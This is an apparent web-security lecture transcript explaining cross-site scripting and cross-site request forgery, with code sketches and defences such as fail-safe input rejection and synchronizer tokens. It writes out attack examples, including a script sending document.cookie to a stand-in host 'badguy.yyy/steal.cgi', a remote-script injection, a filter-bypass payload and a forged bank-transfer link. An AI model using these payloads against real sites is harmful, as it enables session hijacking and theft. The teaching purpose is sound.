The next slide shows the essence
of cross-site scripting. If you go to a web page,
the web server sends over commands, and your web browser interprets those
commands to draw up an image. Now, if you look at the first HTML,
which is the language used for these web pages, this one says,
start a paragraph and say hello. And then the script tags say,
between the beginning and the end of these tags,
execute whatever is there. And in this case, it's something you don't
expect and don't want, which is nasty. That's what is called malicious logic. So what happens in this case is
the web browser first puts up hello with the exclamation point and
then does the commands in the middle. And that's cross-site scripting. There are three forms of these attacks,
reflected, stored, and what's called DOM injection. The next slide shows a reflected attack. We have a website that requires you
to authenticate to gain access. Once you've gained that access,
the website stores a session cookie. So the cookie is stored wherever
your browser stores cookies. And the next time you connect to
that site, that site will say, send over your cookies, and the authentication
cookie goes over along with any others. And then the site says,
okay, you're authenticated, we'll just go ahead and act. Now, the way the attack usually
works is the attacker sends out a large number of messages,
emails typically, with a URL in them, and the URL
basically points to the remote site. But what it does is it contains a script, and the script will simply say,
copy the cookies for that site, and send them to this second site,
the bad guy and gal's site. So if you look at the HTML there,
it's going to draw up an image. And by the way, when this is done,
the image is often very small, like a pixel, so you can't see it. But in this case, the image it's going to
draw is simply something from xxx.yyy. However, when you try to log in to that
account there, you've got a script. And so what the script does
is it goes to the data and then sends over the URL
http://badguy.yyy/steal.cgi?, concatenated with the cookie for the appropriate website, that is xxx.yyy. And you can access that even if you
have third-party cookies turned off because it's being requested
by the web page you're going to, so it goes ahead and sends that out. And then presumably what will come back
is the legitimate name of the account, and then you'll be able to go ahead and
log in. So when the victim clicks
on that particular URL, the attacker gets all the cookies,
and thereby access as the victim. Going onto the next slide,
that's through the email and such. But spam filters are fairly
good about finding those. And in general, a good rule of thumb is don't click
on it if you don't know what's there. Or your mail system may not show HTML, may not draw HTML pages
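
To make the reflected attack described above concrete, here is a minimal sketch of how a script placed in a URL can end up inside the page that the legitimate site sends back. The `renderSearchPage` handler, the `/search` path, and the `q` parameter are assumptions made up for illustration; only the xxx.yyy and badguy.yyy/steal.cgi names come from the slide. It is meant to show the mechanism, not any particular site's code.

```javascript
// Hypothetical server-side handler (an assumption for this sketch): it echoes
// the "q" query parameter straight into the HTML it returns.
function renderSearchPage(requestUrl) {
  const query = new URL(requestUrl).searchParams.get("q") ?? "";
  // No checking or encoding: whatever arrived in the URL becomes markup.
  return `<p>Results for ${query}</p>`;
}

// The script described in the lecture: append the cookie to the attacker's URL.
const payload =
  "<script>document.location='http://badguy.yyy/steal.cgi?'+document.cookie</script>";

// The link the attacker mails out points at the legitimate site, xxx.yyy.
const emailedLink = "http://xxx.yyy/search?q=" + encodeURIComponent(payload);

// When the victim clicks, the site reflects the script back in its own page,
// so the browser would run it with that site's cookies.
const page = renderSearchPage(emailedLink);
console.log(page.includes(payload)); // true
```

The point of the sketch is that the script never has to be stored on xxx.yyy. It travels in the link and is reflected back by the site the victim trusts.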
when you look at the mail. So there's another trick you can use. Most people have gone to a blog
at least once in their life, and you see that remote people can
enter information into the blog. The data that you enter into the blog,
the blog entry, is saved on the server. And then when someone comes in to
view the blog, among other things, that entry will come up. Well, that entry comes up and
is drawn there on your browser. So why not embed commands in that? And that's basically what
stored cross-site scripting is. The attacker stores the malicious URL or HTML on a page that you will visit. And it's important to understand that
it's not in the control of the person who controls the web server. Anyone who can write to the blog
can do this sort of thing. So here is an example, if my blog allows
me to insert HTML commands in what I enter into the blog when I'm typing
my comment, and most of them do. If they don't check for
particular commands, I can enter something like the line
shown under "blog comment allows this." And what it will do is
it will go ahead and download the script from
mysite/messwithyou.js, JavaScript, and then go ahead and
execute it in your browser. So what happens is if that command is in
the blog, the next person to look at it gets caught, and messwithyou will
go ahead and run in your browser. Now, the next slide talks about something
that's a little bit more complex, it's called DOM, Document Object Model. And this is really how browsers work,
they get a Document Object Model, and then use that model to display
the object, which is parts of a web page. Now, the reason this is interesting
is because with stored XSS and reflected XSS, you assume that
the web page you're storing, or going to, or whatever is static. DOM XSS is similar, but
it allows you to do a little bit more. Since that remote page is static and
loaded in your browser when you visit, there's, for example, a web page that is going to write out the URL: the base URI of the document,
with "URL" as the prefix, and document.write will put it up on
your browser so you can see it. So the request that I
send is listed below. Now, what happens is, when the web browser receives that URL,
as soon as it gets to the sharp sign, it instantiates the page and
then executes what's between scripts. And so that will be an alert,
which will cause a beep. So now, when we go to this web page,
it goes ahead and runs document.write URL, and then the pound sign gets instantiated,
and they get a beep. So this is how DOM
cross-site scripting works. Now, the next slide
discusses combinations. And it's important to understand
that attacks can get very complex, so these can be combined. The first two are fairly easy because
they can be detected at the server, just look for scripts in the input URL,
okay, or in the body. If you see those scripts as you're
reading things or as your mail program is analyzing things, then you say, hey,
wait a minute, and you've caught it. The problem is that the third one,
the web pages on the server are static. But the DOM attack
tricks your browser into putting up something that appears to be
from the server, but has a few additions. So the source is where things come from,
the sink is where things go. What you do is you look for
sources that others control. On that web page, you have
the document base URI, that's dynamic, that's going to be whatever
it is in my browser. And as a result,
when my browser goes to print that or draw it up on my screen,
I am trusting whatever is there. So you need to be careful and be sure
here that when you output something or accept something from the server and then proceed to draw that,
you check it before you draw it. And we'll talk about
a couple of ways to do this. First, the wrong way. Here is an attempted fix, okay? The basic idea here is
that when I see a script here, I'm going to simply comment it out. So here's the web page, it's vulnerable. Notice the document.write, and
the document.URL.substring, and the document.URL.length,
all of that is JavaScript. And then notice that the pos
is the indexOf("name="). So the idea is a parameter will come over,
the parameter's key will be name, and then the value
was whatever follows name equals, okay? So that's what pos does,
it moves it beyond the end of name equals. So when you get the document.URL.length,
that gives you the length beyond the name equals, which is simply going to
be, presumably, the name of the person. And the URL substring pulls that out. And then the write simply writes up
the name, so it would be, welcome, hi, Matt, or whatever. And then it will go on and say,
welcome to our system, and so forth. Here's the attack,
the next slide shows the legitimate one, vulnerable.site/welcome.html?name=Matt. And so when I go to that website
with that URL, it'll say, hi, Matt, because it gets the name from
the field following the name. But what happens if I do
something a little nasty? The next one shows that. Now what happens is the name is a script,
so the browser is going to execute
alert(document.cookie), which will put up
the cookie in an alert box. So this one is basically harmless,
it notifies you that hey, look, I've got your cookie. But you can put a lot of other
things within that script, anything JavaScript can do,
you can put in there. So how do we avoid this? Let's try filtering, we scan the input for
something that begins with script and then ends with a close script tag,
this is on the next slide. Now, the problem is that script, so
why don't we just comment it out? That's an easy solution, and you can see
where it says, and replace them with this. What I've done is I've replaced
script with an open comment, and I've replaced /script,
the closing tag, with a close comment. And now when that web page comes up
on my browser, it sees the comment, it sees the <!-- and says, okay,
I'm not parsing anything or doing anything until I see
the close comment, which it does. Here is why it doesn't work,
though, the next slide shows that. If you go back to the previous slide,
that's something. What happens if the attacker begins
the something with a close comment, puts in the malicious JavaScript,
and then ends it with an open comment? And here's why that is inadequate: as the slide shows,
that's exactly what's embedded there. And what this says is,
go to the URL http://none, and on an error open up
the fake login screen. And that way I can get your login data, when you go there, you'll log in and
I'll get all your data. So that's an example of
why that's inadequate. The problem is you can't simply replace
the beginning and the ending script tags. You've got to scan the something to
make sure that whatever is in there doesn't close the open tag you put in and open the closed tag you put in,
and have nasty stuff in between. The next slide, the filtering shows
exactly what the web browser will see. Notice the comments at the beginning and
at the end, and the image will still be drawn. This bypasses the filter completely. So how do you prevent this? Well, the basic rule is to apply
the principle of fail-safe defaults that we talked about earlier. Scan the input, if you do not know
that that input is good, reject it. Don't try to embed it,
don't try to sanitize it, just dump it because who knows how
browsers and HTML will evolve. There are specific things
that you know are good. For example, a string with no tags,
accept that. But if it's got a tag in it, it may or
may not be good, so you reject it. And the other thing you
have to watch out for is you can't just scan looking for an open
bracket at the beginning of the tag. Because I can encode those in Unicode, for example, or in HTML special characters. And so when you scan that,
you won't see the open tag. But my browser sure will interpret
those Unicode symbols as an open tag. So you have to watch out for the encoding. And the right way to do this, by the way,
is when the input comes in, make sure its encoding is canonical, that there's some
canonical form that you can map it to. And once you've done that mapping,
then you scan it. That way if they're using Unicode,
when you do the canonicalization, you'll either look for the Unicode open tag, or the Unicode will get
mapped into an ASCII or UTF-8 open-bracket character, and
you'll reject it on that basis. But again, the best thing here
to do is fail-safe defaults. If you don't know it's good, dump it. Now, there's an attack related to cross-site
scripting that's a little bit nastier, it's called cross-site request forgery. And the basic idea is as an attacker, I'll trick the user into submitting
information to a web application. But it's not going to be the web
application they think it is, it's going to be the one I have. So the approach basically
is to build the URL or a script and
then trick you into executing it. And here's a good example. I have a bank account,
Alice has a bank account. Alice wants to transfer $100 to Bob. Evil Edgar doesn't like that, and
so Evil Edgar is going to try and steal Alice's money. So the next slide shows how he does it. And in order to understand this, I have to show you what
a legitimate request looks like. It's littleoldbank.com, and
I have no idea if that really exists, by the way, it's just a made up URL. If it does,
I apologize to littleoldbank.com. Anyway, the legitimate request says, transfer to the account
Bob in the amount $100. So Alice logs into
Little Old Bank's website. Now, while she's logged in,
she gets a letter from Bob or from Edgar containing what you see there. Notice transfer to Ed's account and
the amount is $100. That's the source, the href,
where it's going to go. But of course, the text doesn't say that,
it says, see my new house, click here and you'll see it. She gets that letter and
she clicks there, boom. That request goes off to
littleoldbank.com, Alice is logged in, she therefore will execute that
command and Ed gets 100 bucks. So that's how this cross-site
request forgery works. Now, this one is a little bit primitive,
there are other ways to do it. The scenario that I just showed
you is called a GET scenario because the request is sent
to the server using a GET. There's another one called POST. The attacker there is going to provide
you with a form that you populate. And then when you submit it,
of course, the attacker gets the data. And this can be submitted
automatically using JavaScript, for example, the commands are there. So what happens is you load that form, the person fills it out, and
then it gets submitted. So how do you defend against that one? That one's a little bit trickier. The best way to do it is a technique
called the synchronizer token pattern. And the idea here is to bind the session with the particular user and
the particular windows. So when the session starts,
you generate a random token. In anything that is user sensitive,
you embed it. So that when the user responds,
the token comes back. That kills Edgar's attempt to
steal $100 from Alice because when that request goes over,
it doesn't have the token. And so the session says, wait a minute,
this is bogus and I'm going to ignore it. There are other things you can do as well. Check the HTTP Origin header, for example. Be sure it comes from the particular
browser involved in the session. And on the client side,
if the browser is on a sensitive site, like a bank, make sure that
during that session the client, the browser can't go to other sites, and
log off or close the browser when done. Because banks and sensitive sites almost
always use cookies that are deleted as soon as the session ends or
the browser is closed.
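
As a rough sketch of the synchronizer token pattern described above, the following shows one way a server might generate a random token when the session starts, embed it in a sensitive form, and refuse any request that does not bring it back. The function names, the `csrf_token` field, the `/transfer` path, and the in-memory session store are all assumptions made up for illustration, not anything taken from the slides. It uses Node's built-in `crypto` module.

```javascript
const crypto = require("crypto");

// In-memory session store, for the sketch only (an assumption); a real
// application would use whatever session mechanism it already has.
const sessions = new Map();

// When the session starts, generate a random token and bind it to the session.
function startSession(user) {
  const sessionId = crypto.randomBytes(16).toString("hex");
  const csrfToken = crypto.randomBytes(32).toString("hex");
  sessions.set(sessionId, { user, csrfToken });
  return { sessionId, csrfToken };
}

// Embed the token in every sensitive form the server sends to this user.
function renderTransferForm(csrfToken) {
  return (
    '<form method="POST" action="/transfer">' +
    `<input type="hidden" name="csrf_token" value="${csrfToken}">` +
    '<input name="to"><input name="amount">' +
    "</form>"
  );
}

// Accept a request only if it carries the token bound to its session.
function isRequestAuthentic(sessionId, submittedToken) {
  const session = sessions.get(sessionId);
  if (!session || typeof submittedToken !== "string") return false;
  const expected = Buffer.from(session.csrfToken);
  const actual = Buffer.from(submittedToken);
  // timingSafeEqual throws on a length mismatch, so compare lengths first.
  return (
    expected.length === actual.length &&
    crypto.timingSafeEqual(expected, actual)
  );
}

const alice = startSession("alice");
// Alice submits the form the bank gave her, so the token comes back.
console.log(isRequestAuthentic(alice.sessionId, alice.csrfToken)); // true
// Edgar's link rides on Alice's session but cannot include the token.
console.log(isRequestAuthentic(alice.sessionId, undefined)); // false
```

Edgar's forged request still arrives with Alice's cookie, but since he never saw the form the bank sent her, he has no way to supply the token, and the request is dropped.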